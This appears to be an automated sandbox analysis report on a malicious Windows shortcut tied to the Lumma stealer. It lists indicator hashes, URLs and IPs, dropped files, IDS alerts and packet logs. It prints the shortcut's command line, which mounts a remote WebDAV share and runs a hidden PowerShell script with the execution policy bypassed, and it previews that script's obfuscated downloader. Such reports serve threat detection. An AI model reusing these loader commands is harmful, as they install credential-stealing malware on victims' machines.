	http://185.147.124.40/Capcha.html	Get hash	malicious	Unknown	Browse	185.147.124.40
CLOUDFLARENETUS	QnNRjhoN.ps1	Get hash	malicious	LummaC	Browse	172.67.207.38
	tOE2mg8TbU.exe	Get hash	malicious	LummaC	Browse	104.21.7.3
	BDxsBr8Dce.exe	Get hash	malicious	LummaC	Browse	172.67.149.196
	c5bnEkMx.ps1	Get hash	malicious	LummaC	Browse	104.21.96.1
	YzujxlvYB1.exe	Get hash	malicious	LummaC	Browse	104.21.76.144
	DLgUizecOn.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	infrarecorder.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	AEO7faaL.ps1	Get hash	malicious	LummaC	Browse	104.21.32.1
	https://afw.soundestlink.com/ce/c/675c127e5a5226f9e7b86686/675c13ae85cd17d1e3e2ab54/675c13c9f9a08fb1fbb3e577?signature=3f4d77f7452e61cf1e0cb9ce4a3540d02af0944caf975b089573a2fc1d891103	Get hash	malicious	Unknown	Browse	104.21.32.1
	https://artsofbristy.com/?data=ZGdyaW5zdGVhZEBjaXR5b2Zyb3hib3JvLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.147.125.51
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.147.125.51
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.147.125.51
	RFQ3978 39793980.pdf.exe	Get hash	malicious	FormBook	Browse	185.147.125.51
	https://link.edgepilot.com/s/f30932b1/vPPKRjWXhUuvPsJT0zGKsQ?u=https://lf7oxrhbb.cc.rs6.net/tn.jsp?f=001h06J4Rg18suvxSEI1tED4DAF8iRuyxY1F6LaYcn7sb4iX7GBolUHc7ee-KUx3ocXE9JkVShRAfV1x6aenzzKcDmVc2_grDROu5C380NMdm5zgykpeK24RW4ydxOZY-zzWGqXDAcSMsLIRx7mTviOEg==%26c=rtZvyEmdrWl6DZ9XsciJKGlh47UQUNn-J3NXlYUvzX0mHT2yPp0J7g==%26ch=pbMEYYEPfkmXeu_oUdJD2iMHpz6dLW5FEUtMz_fcwAIrF1HSqrYuCA==%26__=wp-admin/wp/2XWV/Dcndx/c3Njb3R0QGRjbmR4LmNvbQ=%3D	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	185.147.125.51
	n70CrSGL8G.exe	Get hash	malicious	RedLine	Browse	185.147.125.51
	Doc_13-35-42.js	Get hash	malicious	Unknown	Browse	185.147.125.51
	Doc_13-35-42.js	Get hash	malicious	Unknown	Browse	185.147.125.51
	https://t.ly/8cSDx	Get hash	malicious	Unknown	Browse	185.147.125.51
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.147.125.51
3b5074b1b5d032e5620f69f9f700ff0e	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	185.147.125.51
	https://nam.dcv.ms/0CX72Iqyxf	Get hash	malicious	HTMLPhisher	Browse	185.147.125.51
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	185.147.125.51
	pxGom77XRW.doc	Get hash	malicious	Unknown	Browse	185.147.125.51
	GSAT3WdrJ8.doc	Get hash	malicious	Unknown	Browse	185.147.125.51
	YRhWQcRXWV.doc	Get hash	malicious	Unknown	Browse	185.147.125.51
	FINAL_PDF.exe	Get hash	malicious	Unknown	Browse	185.147.125.51
	Filezilla.exe	Get hash	malicious	Unknown	Browse	185.147.125.51
	cv.exe	Get hash	malicious	Unknown	Browse	185.147.125.51
	Filezilla-stage2.exe	Get hash	malicious	Unknown	Browse	185.147.125.51
a0e9f5d64349fb13191bc781f81f42e1	X5o3C9xtfa.exe	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	QnNRjhoN.ps1	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	tOE2mg8TbU.exe	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	BDxsBr8Dce.exe	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	c5bnEkMx.ps1	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	YzujxlvYB1.exe	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	DLgUizecOn.exe	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	infrarecorder.exe	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	AEO7faaL.ps1	Get hash	malicious	LummaC	Browse	172.67.207.38 185.147.125.51
	PyrNUtAUkw.docx	Get hash	malicious	Unknown	Browse	172.67.207.38 185.147.125.51

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	18776
Entropy (8bit):	5.499721722375875
Encrypted:	false
SSDEEP:	384:3kej4R0GKB4ZYEmpbDc2tWiwXIXteSI6Ct2+RchSHT3owxQnN0PeJGnXM1EEvG+R:08Y0XqKbDbA4d1TufHb9uNPCc2ZYWnAB
MD5:	C811186148FD227F39E7725F7930BBE7
SHA1:	3EE3AC3F570A921EF82E1AE58E32466B77CF1B9A
SHA-256:	95BAC386FF3191B9689E727BDF4B745FA64ABBC3BDC636BC156A73DDF4E6ED3A
SHA-512:	E52A9DA3F1CE999B0CC4C5D1DDB373699EADED67748EA41DA9644485187DF021237599EB89401840B128AC97533B2FE75C7560B34C77EE369DEFB279A37A453A
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........H...............o..b~.D.poM...V..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\..............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...f.......System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.3.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivvrssih.kvp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xe0rhmb3.dz4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\putty.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2793736
Entropy (8bit):	6.40109576527517
Encrypted:	false
SSDEEP:	24576:GFI6XJnga78X6SzTMrm/FvO2nzfdMvQh9TzYTkj9IKrxMD1uxTJ03VoulrX+ZqJ:GEr5tvO2nzy4h9TsYaKqS0quxX+O
MD5:	FCE954E0B8ABEC15C129A54BA33ED2CD
SHA1:	F4C6265558984B615E62602447217B487163ED49
SHA-256:	DC9B46B3B0F75B8C054656BFACBB770C67EABDD8D9DCB9EEE54664FCE74407DA
SHA-512:	649304D99C8EFE2EA2BB4C271EE284E1B84331685D32D2F649B43DA37977FD09811DE13CEBB21CA881A1F06BA9E8ABCF0BD4F7514C72F94BAB1289D122208E9A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B.......B.....g.B......B.......B......B...C.W.B......B.....g.B.......B.......B.Rich..B.........PE..L....@BP..........................................@.................................M+...@.................................dS.......0.......................$........................................@............................................text.............................. ..`.rdata.............................@..@.data...........t...b..............@....rsrc........0......................@..@.reloc........$.......$.............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\adv.ps1

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with very long lines (309), with CRLF line terminators
Category:	dropped
Size (bytes):	2173
Entropy (8bit):	4.765278850704828
Encrypted:	false
SSDEEP:	48:AmUrBJ+kYtTXg0lsLnFroz6dTRTD6MOx+3ZLRQ0cKiMf:rUrDCM7R9sx+JLRQba
MD5:	10891F0A4C19021664493C6209F6F32D
SHA1:	358FBED42A7A12B1DA18284CB487128A92D66B8D
SHA-256:	C92A041C50A79B729DED5541F303FDB01CDCE37BCF38927F6CDCDC6A35284676
SHA-512:	94976D772CD8DCB84B56A64B347C9C6409753C6F790F354576A2DE119C93EF7AB11C8231061951403EE5CEF0E708AECA27937855B0ACC45B9496E9D176E1A149
Malicious:	true
Preview:	$z = "t";..$m = "o";..$l = "d";..$f = "m";..$x = "e";..$j = "n";..$k = "g";..$s = ".";..$n = "c";..$t = "o";..$g = "m";..$q = "/";..$h = "web";..$u = "dav";..$b = "/";..$v = "infra";..$w = "recor";..$r = "der";..$y = ".";..$c = "e";..$e = "x";..$i = "e";......$state1 = "$env:TEMP\";..$state2 = "put";..$state3 = "ty";..$state4 = ".e";..$state5 = "xe";....$natoblack = $state1 + $state2 + $state3 + $state4 + $state5;....$europe = $z + $m + $l + $f + $x + $j + $k + $s + $n + $t + $g + $q + $h + $u + $b + $v + $w + $r + $y + $c + $e + $i;..$AA = "I";..$AB = "n";..$AC = "v";..$AD = "o";..$AE = "k";..$AF = "e";..$AG = "-";..$AH = "W";..$AI = "e";..$AJ = "b";..$AK = "R";..$AL = "e";..$AM = "q";..$AN = "u";..$AO = "e";..$AP = "s";..$AQ = "t";..$AR = " ";..$AS = "-";..$AT = "U";..$AU = "r";..$AV = "i";..$AW = " ";..$AX = "$";..$AY = "e";..$AZ = "u";..$BA = "r";..$BB = "o";..$BC = "p";..$BD = "e";..$BE = " ";..$BF = "-";..$BG = "O";..$BH = "u";..$BI = "t";..$BJ = "F";..$BK = "i";..$BL = "l";..$BM

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 2 13:36:48 2024, mtime=Wed Oct 2 13:36:48 2024, atime=Wed Oct 2 13:36:48 2024, length=331776, window=hide
Entropy (8bit):	4.436363247542515
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	d2W4YpqsKg.lnk
File size:	2'169 bytes
MD5:	30e8e8bf3ef225d1609c013f7914d88f
SHA1:	a8a268d6980623d1eb7eb56e8a4788a2c5b855a3
SHA256:	80eea127b8641313f5065b35a541dfff1a5dfd645a2e6e31b353ecd2d756cc46
SHA512:	1703eb1ac57fdcb1d222be1b25b535cb5fee2c4ab58275901d06e2572224a7f0d1a8cbd6f0f1fc89a0a212bb0139887b66655416b27b5d68e76856f8ebe65c8c
SSDEEP:	48:8x3KsmsvsIylJz+vI3xnV+X+DyDam1+1Xv3/Yk:8x3Ksb03HCvI3xnUX5D2v/Y
TLSH:	6641231536ED9332E3B78B375479A3509632BC5AEC535B1D20C4068C2C61E21ED70F35
File Content Preview:	L..................F.... ...3.......u.......u...............................5....P.O. .:i.....+00.../C:\...................V.1......Y{...Windows.@........R.@.Y{...............................W.i.n.d.o.w.s.....Z.1......Y\|...System32..B........R.@.Y\|.......

File Icon


Icon Hash:	74f0e4e4e4e1e1ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\cmd.exe
Command Line Argument:	/c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\%USERNAME%\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\%USERNAME%\Documents\adv.ps1
Icon location:	\\todmeng.com@SSL\webdav\standart.ico

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T16:43:04.424038+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49715	185.147.125.51	443	TCP
2024-12-13T16:43:51.288847+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49840	172.67.207.38	443	TCP
2024-12-13T16:43:52.014792+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.3	49840	172.67.207.38	443	TCP
2024-12-13T16:43:52.014792+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.3	49840	172.67.207.38	443	TCP
2024-12-13T16:43:53.280240+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49846	172.67.207.38	443	TCP
2024-12-13T16:43:54.005523+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.3	49846	172.67.207.38	443	TCP
2024-12-13T16:43:54.005523+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.3	49846	172.67.207.38	443	TCP
2024-12-13T16:43:55.546005+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49852	172.67.207.38	443	TCP
2024-12-13T16:43:57.112561+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.3	49852	172.67.207.38	443	TCP
2024-12-13T16:43:58.553019+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49859	172.67.207.38	443	TCP
2024-12-13T16:44:00.844722+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49865	172.67.207.38	443	TCP
2024-12-13T16:44:03.434940+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49871	172.67.207.38	443	TCP
2024-12-13T16:44:05.732299+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49877	172.67.207.38	443	TCP
2024-12-13T16:44:09.737572+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.3	49888	172.67.207.38	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 16:43:02.956588984 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:02.956613064 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:02.956682920 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:02.958481073 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:02.958497047 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.423970938 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.424037933 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:04.427542925 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:04.427550077 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.428016901 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.472202063 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:04.490844965 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:04.531328917 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.964217901 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.964283943 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.964386940 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:04.964495897 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:04.964513063 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:04.964529991 CET	49715	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:04.964534998 CET	443	49715	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:09.456816912 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:09.456856966 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:09.456932068 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:09.458040953 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:09.458056927 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:10.893879890 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:10.894145966 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:10.895725012 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:10.895740032 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:10.895971060 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:10.933657885 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:10.975332022 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:11.447093010 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:11.447160006 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:11.447371960 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:11.453067064 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:11.453088999 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:11.453102112 CET	49726	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:11.453124046 CET	443	49726	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:11.454874992 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:11.454916954 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:11.455005884 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:11.455179930 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:11.455195904 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:12.893116951 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:12.894012928 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:12.894026041 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:12.895873070 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:12.895879030 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:13.440036058 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:13.440088987 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:13.440141916 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:13.440232038 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:13.440247059 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:13.440257072 CET	49732	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:13.440263033 CET	443	49732	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:13.789592028 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:13.789639950 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:13.789746046 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:13.790150881 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:13.790164948 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.235899925 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.235982895 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.237302065 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.237307072 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.237535000 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.239737988 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.283334017 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.782206059 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.782274008 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.782355070 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.782684088 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.782702923 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.782713890 CET	49738	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.782718897 CET	443	49738	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.783756971 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.783776045 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:15.783857107 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.784039974 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:15.784054041 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.317859888 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.318547964 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.318579912 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.319420099 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.319427013 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.865672112 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.865780115 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.865828991 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.866063118 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.866084099 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.866094112 CET	49743	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.866100073 CET	443	49743	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.879463911 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.879512072 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.879651070 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.879828930 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.879844904 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.880186081 CET	49750	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.880213022 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:17.880264997 CET	49750	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.880444050 CET	49750	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:17.880456924 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.322988987 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.323755026 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.324420929 CET	49750	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.324430943 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.324881077 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.324897051 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.325618029 CET	49750	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.325627089 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.325867891 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.325875044 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.874648094 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.874715090 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.874757051 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.874800920 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.874887943 CET	49750	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.874887943 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.875225067 CET	49750	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.875243902 CET	443	49750	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.876391888 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.876430988 CET	49749	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.876430035 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.876440048 CET	443	49749	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.877594948 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.877636909 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.877700090 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.877965927 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.877983093 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.879039049 CET	49758	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.879069090 CET	443	49758	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:19.879122972 CET	49758	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.879617929 CET	49758	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:19.879631042 CET	443	49758	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.363135099 CET	443	49758	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.363761902 CET	49758	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.363792896 CET	443	49758	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.364593983 CET	49758	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.364603996 CET	443	49758	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.366493940 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.367000103 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.367046118 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.367767096 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.367774010 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.922177076 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.922261000 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.922334909 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.922604084 CET	443	49758	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.922668934 CET	443	49758	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.923101902 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.923124075 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.923139095 CET	49757	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.923145056 CET	443	49757	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:21.923245907 CET	49758	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:21.924308062 CET	49758	443	192.168.2.3	185.147.125.51
